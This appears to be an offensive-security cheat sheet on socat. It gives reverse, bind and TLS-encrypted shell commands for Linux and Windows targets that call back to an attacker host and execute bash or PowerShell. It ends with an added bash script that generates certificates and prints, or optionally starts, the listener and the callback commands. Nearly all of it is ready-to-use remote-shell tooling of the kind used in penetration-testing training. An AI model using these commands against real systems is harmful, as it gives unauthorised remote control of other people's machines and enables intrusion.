Socat

  • Socat (for SOcket CAT) establishes two bidirectional byte streams and transfers data between them. Data channels may be files, pipes, devices (terminal or modem, etc.), or sockets (Unix, IPv4, IPv6, raw, UDP, TCP, SSL). It provides forking, logging and tracing, different modes for interprocess communication and many more options.

It can be used, for example, as a TCP relay (one-shot or daemon), as an external socksifier, as a shell interface to Unix sockets, as an IPv6 relay, as a netcat and rinetd replacement, to redirect TCP-oriented programs to a serial line, or to establish a relatively secure environment (su and chroot) for running client or server shell scripts inside network connections. Socat supports SCTP as of version 1.7.0.

Versions for all major platforms are available.

Socat reverse shells

A basic reverse shell listener in socat:

adversary@kali:~# socat TCP-L:<port-number> -

To connect back to the listener on a Linux target system:

socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"

To connect back to the listener on a Windows target system:

socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes

Socat bind shells

Set up a listener on a Linux target:

socat TCP-L:<PORT> EXEC:"bash -li"

Set up a listener on a Windows target:

socat TCP-L:<PORT> EXEC:powershell.exe,pipes

The pipes option makes socat talk to the spawned program over a pair of unnamed pipes instead of a Unix socket pair; this is what the Windows side needs for its input and output handling in a CLI environment, so leave it off on Linux targets.

Regardless of the target machine, connect to the waiting listener with:

socat TCP:<TARGET-IP>:<TARGET-PORT> -

For a fully stable Linux reverse shell, use the tty technique shown in the encrypted-shell section: a FILE:`tty`,raw,echo=0 listener on the attack machine and the pty,stderr,sigint,setsid,sane options on the target's EXEC address. Those options belong to the EXEC address, so they work the same over a plain TCP-L/TCP pair as over OPENSSL.

Socat encrypted shells

Setting up an OPENSSL-LISTEN address using the tty technique and a PEM file called encrypt.pem (socat's cert= option expects the private key and the certificate together in that one file):

adversary@kali:~# openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
adversary@kali:~# cat shell.key shell.crt > encrypt.pem
adversary@kali:~# socat OPENSSL-LISTEN:<port-number>,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0

Connecting back to this listener from the target machine:

socat OPENSSL:<IP address attack machine>:<port-number>,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane

  • verify=0 disables checking of the listener's certificate, so the target accepts any certificate presented to it; the connection is encrypted but the target cannot tell the real listener from an interposed one

  • pty allocates a pseudoterminal on the target – part of the stabilisation process

  • stderr makes sure that any error messages get shown in the shell (often a problem with non-interactive shells)

  • sigint passes Ctrl+C through to the sub-process, so a command running inside the shell can be interrupted without killing the socat connection itself

  • setsid creates the process in a new session

  • sane resets the pty's terminal settings to sensible defaults (like stty sane), which stabilises the terminal.
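The following script is an added example, not part of the original page or of the socat project. It builds and sanity-checks the plain and encrypted socat command lines from the reverse-shell and encrypted-shell sections above: it generates the key/cert pair non-interactively (the -subj argument avoids the prompts of the bare openssl req invocation), verifies that the combined PEM really contains both the private key and the certificate, and prints the listener and callback commands. The callback is shown twice: with verify=0 as on the page, and with the listener's certificate pinned via socat's cafile= and commonname= options instead. The file names (shell.key, shell.crt, encrypt.pem), the CN "listener", and the default address 10.0.0.5 are assumptions chosen for the example.

```shell
#!/usr/bin/env bash
# Added example (not from the original page or the socat project).
# Assumed names: shell.key, shell.crt, encrypt.pem, CN=listener.
# openssl is only needed for the PEM generation step; socat only if RUN=1.

# Validate a TCP port: digits only, 1..65535. Returns 0 on success.
valid_port() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Plain (unencrypted) reverse shell, listener side.
plain_listener_cmd() {
    valid_port "$1" || return 1
    printf 'socat TCP-L:%s -\n' "$1"
}

# Plain reverse shell callback from a Linux target, with the same EXEC
# stabilisation options the encrypted section uses; pair it with a
# FILE:`tty`,raw,echo=0 listener for a fully interactive shell.
plain_callback_cmd() {
    valid_port "$2" || return 1
    printf 'socat TCP:%s:%s EXEC:"bash -li",pty,stderr,sigint,setsid,sane\n' "$1" "$2"
}

# Generate a self-signed certificate in $1 and the combined PEM (key + cert).
# -subj keeps "openssl req" from prompting for the subject fields.
make_listener_pem() {
    dir="$1"
    openssl req -newkey rsa:2048 -nodes -keyout "$dir/shell.key" -x509 -days 362 \
        -subj '/CN=listener' -out "$dir/shell.crt" 2>/dev/null || return 1
    cat "$dir/shell.key" "$dir/shell.crt" > "$dir/encrypt.pem" || return 1
    chmod 600 "$dir/shell.key" "$dir/encrypt.pem"
}

# socat's cert= option wants the private key AND the certificate in one file;
# a PEM with only one of them makes OPENSSL-LISTEN fail at startup.
check_pem() {
    [ -r "$1" ] || return 1
    grep -q -e '-----BEGIN .*PRIVATE KEY-----' "$1" || return 1
    grep -q -e '-----BEGIN CERTIFICATE-----' "$1"
}

# Encrypted listener attached to the attacker's own tty (raw mode, no local echo).
tls_listener_cmd() {
    valid_port "$1" || return 1
    printf 'socat OPENSSL-LISTEN:%s,cert=%s,verify=0 FILE:`tty`,raw,echo=0\n' "$1" "$2"
}

# Encrypted callback. Without a third argument this is the page's verify=0
# form: the target accepts any listener certificate. With the listener's
# certificate file as $3, cafile= pins that certificate and commonname=
# must match the CN the certificate was generated with.
tls_callback_cmd() {
    valid_port "$2" || return 1
    if [ -n "$3" ]; then
        printf 'socat OPENSSL:%s:%s,cafile=%s,commonname=listener EXEC:"bash -li",pty,stderr,sigint,setsid,sane\n' "$1" "$2" "$3"
    else
        printf 'socat OPENSSL:%s:%s,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane\n' "$1" "$2"
    fi
}

main() {
    port="${1:-4444}"; lhost="${2:-10.0.0.5}"   # hypothetical attacker address
    workdir=$(mktemp -d) || return 1
    if command -v openssl >/dev/null 2>&1 && make_listener_pem "$workdir" && check_pem "$workdir/encrypt.pem"; then
        echo "# key+cert written to $workdir/encrypt.pem, copy $workdir/shell.crt to the target for pinning"
    else
        echo "# openssl unavailable or PEM generation failed; showing commands only" >&2
    fi
    echo "# on the attack machine:"
    tls_listener_cmd "$port" "$workdir/encrypt.pem"
    echo "# on the target, as on the page (no verification of the listener):"
    tls_callback_cmd "$lhost" "$port"
    echo "# on the target, pinning the listener's certificate:"
    tls_callback_cmd "$lhost" "$port" shell.crt
    # RUN=1 actually starts the listener on this terminal.
    if [ "${RUN:-0}" = 1 ]; then eval "$(tls_listener_cmd "$port" "$workdir/encrypt.pem")"; fi
}

main "$@"
```

Run it as `bash socat_shells.sh 4444 10.0.0.5` to generate the PEM and print the commands, or with `RUN=1` to start the listener in the current terminal. The pinned variant only works if shell.crt has been copied to the target beforehand; with verify=0, any listener that the target's traffic is steered to will get the shell.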